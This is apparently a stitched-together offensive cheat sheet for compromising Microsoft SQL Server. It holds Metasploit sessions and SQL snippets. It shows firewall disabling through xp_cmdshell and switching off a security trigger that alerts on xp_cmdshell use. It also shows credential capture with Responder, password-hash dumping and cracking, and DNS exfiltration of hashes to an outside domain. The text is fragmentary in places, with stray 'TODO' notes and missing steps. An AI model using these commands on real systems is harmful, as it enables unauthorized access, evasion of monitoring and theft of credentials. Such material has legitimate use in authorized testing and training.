SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
------------ --------------- ------------------
server CONNECT SQL
server VIEW ANY DATABASE
Check out the databases available:
SQL> SELECT name FROM master.sys.databases
name
-----------
master
tempdb
model
msdb
volume
I can look for user generated tables on those databases:
SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> SELECT name FROM sysobjects WHERE xtype = 'U'
name
------------
The mssql_enum is an admin module that will accept a set of credentials and query a MSSQL for various configuration settings.
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
[*] Oct 14 2005 00:33:37
[*] Copyright (c) 1988-2005 Microsoft Corporation
[*] Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Not Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Database Files for master:
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Database Files for tempdb:
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Database Files for model:
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Database Files for msdb:
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_AgentSigningCertificate##
[*] BUILTIN\Administrators
[*] NT AUTHORITY\SYSTEM
[*] V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] BUILTIN\Users
[*] Disabled Accounts:
[*] No Disabled Logins Found
mssql_exec
The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.
msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
CMD => netsh firewall set opmode disable
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > run
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'
output
------
Ok.
[*] Auxiliary module execution completed
msf auxiliary(mssql_exec) >
PowerUpSQL
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
More commands can be found in the github repo or in the tool section.
Linked Servers
Microsoft SQL Server allows links to be created to external data sources such as other SQL servers, Oracle databases, excel spreadsheets, and so on. Due to common misconfigurations the links, or “Linked Servers”, can often be exploited to traverse database link networks, gain unauthorized access to data, and deploy shells.
If you get a error when we try to enable xp_cmdshell on trigger, such as:
Line 181: The transaction ended in the trigger. The batch has been aborted.
These triggers are a policy put in place to alert and block attempts to enable and use xp_cmdshell. The problem is, as sa, we can disable these triggers.
SQL> disable trigger ALERT_xp_cmdshell on all server
And then enable xp_cmdshell
SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
------------------------------
nt service\mssql$poo_public
NULL
Capture credentials using xp_dirtree
Capture credentials using responder and xp_dirtree:
Start Responder:
root@kali# responder -I eth0
Issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on our host:
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users
SELECT name FROM master..syslogins
List Password Hashes
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
Password Cracker
MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
List Privileges
Impossible?
List DBA Accounts
TODO
SELECT is_srvrolemember('sysadmin'); --priv
-- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentationSELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
Current Database
SELECT DB_NAME()
List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
List Tables
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
Find Tables From Column Name
-- NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth Char
SELECT substring('abcd', 3, 1) -- returns c
Bitwise AND
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0
ASCII Value -> Char
SELECT char(0x41) -- returns A
Char -> ASCII Value
SELECT ascii('A') - returns 65
Casting
SELECT CAST('1' as int);
SELECT CAST(1 as char)
String Concatenation
SELECT 'A' + 'B' - returns AB
If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding Quotes
SELECT char(65)+char(66) -- returns AB
Time Delay
WAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requests
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
-- Also check out theDNS tunnel feature of sqlninja
Command Execution
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default: